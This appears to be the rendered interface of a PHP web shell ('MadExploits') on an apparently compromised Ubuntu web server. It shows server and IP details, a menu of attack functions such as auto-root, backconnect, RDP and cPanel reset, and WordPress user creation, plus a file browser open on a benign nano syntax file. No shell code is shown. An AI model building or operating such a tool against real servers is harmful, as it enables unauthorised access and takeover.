Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.154.156
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nano /
[ HOME SHELL ]
Name
Size
Permission
Action
asm.nanorc
884
B
-rw-r--r--
autoconf.nanorc
567
B
-rw-r--r--
awk.nanorc
1.31
KB
-rw-r--r--
c.nanorc
1.89
KB
-rw-r--r--
changelog.nanorc
712
B
-rw-r--r--
cmake.nanorc
788
B
-rw-r--r--
css.nanorc
344
B
-rw-r--r--
debian.nanorc
757
B
-rw-r--r--
default.nanorc
494
B
-rw-r--r--
elisp.nanorc
1.08
KB
-rw-r--r--
fortran.nanorc
1.92
KB
-rw-r--r--
gentoo.nanorc
4.13
KB
-rw-r--r--
go.nanorc
1.31
KB
-rw-r--r--
groff.nanorc
710
B
-rw-r--r--
guile.nanorc
587
B
-rw-r--r--
html.nanorc
1.22
KB
-rw-r--r--
java.nanorc
653
B
-rw-r--r--
javascript.nanorc
822
B
-rw-r--r--
json.nanorc
878
B
-rw-r--r--
lua.nanorc
2.41
KB
-rw-r--r--
makefile.nanorc
535
B
-rw-r--r--
man.nanorc
728
B
-rw-r--r--
mgp.nanorc
200
B
-rw-r--r--
mutt.nanorc
185
B
-rw-r--r--
nanohelp.nanorc
418
B
-rw-r--r--
nanorc.nanorc
2.79
KB
-rw-r--r--
nftables.nanorc
791
B
-rw-r--r--
objc.nanorc
1.66
KB
-rw-r--r--
ocaml.nanorc
859
B
-rw-r--r--
patch.nanorc
590
B
-rw-r--r--
perl.nanorc
1.66
KB
-rw-r--r--
php.nanorc
1.05
KB
-rw-r--r--
po.nanorc
959
B
-rw-r--r--
postgresql.nanorc
2.97
KB
-rw-r--r--
pov.nanorc
632
B
-rw-r--r--
python.nanorc
1.2
KB
-rw-r--r--
ruby.nanorc
1.49
KB
-rw-r--r--
rust.nanorc
1.08
KB
-rw-r--r--
sh.nanorc
1.46
KB
-rw-r--r--
spec.nanorc
1.88
KB
-rw-r--r--
tcl.nanorc
1.95
KB
-rw-r--r--
tex.nanorc
203
B
-rw-r--r--
texinfo.nanorc
463
B
-rw-r--r--
xml.nanorc
527
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : objc.nanorc
## Here is an example for C/C++/Obj-C. syntax m "\.m$" magic "Objective-C source" comment "//" # Stuffs, color brightwhite "\<[A-Z_][0-9A-Z_]+\>" color green "\<(float|double|BOOL|bool|char|int|short|long|id|sizeof|enum|void|static|const|struct|union|typedef|extern|(un)?signed|inline)\>" color green "\<[[:alpha:]_][[:alnum:]_]*_t\>" color green "\<(class|namespace|template|public|protected|private|typename|this|friend|virtual|using|mutable|volatile|register|explicit)\>" color brightgreen "\<(for|if|while|do|else|case|default|switch)\>" color brightgreen "\<(try|throw|catch|operator|new|delete)\>" color brightgreen "\<(goto|continue|break|return)\>" color brightgreen "@(encode|end|implementation|interface)|selector)\>" # GCC builtins. color cyan "__attribute__[[:space:]]*\(\([^)]*\)\)" "__(aligned|asm|builtin|hidden|inline|packed|restrict|section|typeof|weak)__" # Selector/method. color brightmagenta "(^|[[:space:]])\[.*[[:space:]].*\]" color white ":[[:alnum:]]*" color magenta "[[:alnum:]]*:" color white "\[[^][:space:]]*\]" # Strings. color brightblack "'([^'\]|(\\["'abfnrtv\\]))'" "'\\(([0-3]?[0-7]{1,2}))'" "'\\x[0-9A-Fa-f]{1,2}'" color brightblack "<[^= ]*>" ""(\\.|[^"])*"" color brightblue "@"(\\.|[^"])*"" # Multiline strings. This regex is VERY resource intensive, # and sometimes colours things that shouldn't be coloured. ###color brightyellow start=""(\\.|[^"])*\\[[:space:]]*$" end="^(\\.|[^"])*"" # Preprocessor commands. color brightblue "^[[:space:]]*#[[:space:]]*(define|include|import|(un|ifn?)def|endif|el(if|se)|if|warning|error)" # Comments. color yellow "//.*" color yellow start="/\*" end="\*/" # Trailing whitespace. color ,green "[[:space:]]+$"
Close